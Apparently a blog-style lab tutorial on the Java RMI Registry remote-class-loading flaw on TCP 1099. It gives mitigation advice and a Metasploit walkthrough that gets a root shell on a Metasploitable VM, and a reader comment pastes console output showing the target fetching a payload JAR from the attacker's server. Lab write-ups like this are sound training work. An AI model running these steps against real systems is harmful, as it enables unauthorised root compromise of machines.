Java RMI Registry

Port: TCP 1099
Service: Java rmiregistry

Vulnerability: The RMI Registry and RMI Activation services in affected JDK versions run with java.rmi.server.useCodebaseOnly=false by default, so a serialized object received in an RMI call may name a codebase URL from which the JVM will load the class. A remote, unauthenticated attacker sends a crafted RMI call whose class annotation points at an HTTP server they control; the registry fetches the class, instantiates it, and the attacker's code runs with the privileges of the registry process. (http://telussecuritylabs.com/threats/show/TSL20110718-02)

Mitigation: Upgrade to a JDK that includes the fix from Oracle's October 2011 Critical Patch Update (http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html). Independently of the JDK version, start the registry JVM with -Djava.rmi.server.useCodebaseOnly=true (the default from JDK 7u21 onward) so classes are only loaded from the local classpath, and do not expose TCP 1099 to untrusted networks.

Proof of Concept
1. From your Kali machine, load up Metasploit, and do a search for “java_rmi”.

[Screenshot: Metasploit search results for java_rmi]

2. Set Metasploit to use the "java_rmi_server" exploit (exploit/multi/misc/java_rmi_server) and configure the options for your Metasploitable VM: RHOST (RHOSTS in current Metasploit) is the target IP and RPORT stays 1099. Set SRVHOST to the Kali IP that the target can reach, because the module serves the payload JAR over HTTP and the target must be able to fetch it; leaving it on 0.0.0.0 works only when the auto-detected local IP is routable from the victim.

[Screenshot: java_rmi_server options set for the Metasploitable target]

With Metasploit, each exploit module is paired with a payload. The payload can be anything from a basic shell to a Meterpreter session. To see the payloads available for a particular exploit, type "show payloads" at the msf prompt. If you're new to Metasploit, I suggest visiting their website and reading through the various tutorials they have.

The payload I’m using here is “java/shell/bind_tcp”. I had to try a couple different payloads to get a stable one, so the results may be different with your setup.

3. Once the options are set, type "exploit", and you should be presented with a shell. If the module runs as a background job instead (the reverse handler then prints "Exploit running as background job"), wait for the "Command shell session N opened" line and attach to it with "sessions -i N"; anything typed at the msf prompt before attaching is run locally on Kali, not on the victim.

[Screenshot: exploit run producing a root shell]

The registry on Metasploitable runs as root, so the shell you get is a root shell. As always, with root level access you have control of the entire victim machine and can continue enumerating the box for interesting data.

One thought on "Java RMI Registry"
  1. Another great tutorial.

    I have a query/question on this one.

    Once ‘root’ has been gained by the exploit, I am only able to input one command (with output) before the connection is closed. I have to rerun the exploit each time I need to run a command – Is this expected?

    example:

    msf exploit(java_rmi_server) > exploit
    [*] Exploit running as background job.

    [*] Started reverse TCP handler on 192.168.0.16:4444
    msf exploit(java_rmi_server) > [*] 192.168.0.18:1099 - Using URL: http://0.0.0.0:8080/E9TYLTG
    [*] 192.168.0.18:1099 - Local IP: http://192.168.0.16:8080/E9TYLTG
    [*] 192.168.0.18:1099 - Server started.
    [*] 192.168.0.18:1099 - Sending RMI Header...
    [*] 192.168.0.18:1099 - Sending RMI Call...
    [*] 192.168.0.18:1099 - Replied to request for payload JAR
    [*] 192.168.0.18:1099 - Server stopped.
    id
    [*] exec: id

    uid=0(root) gid=0(root) groups=0(root)
    msf exploit(java_rmi_server) >
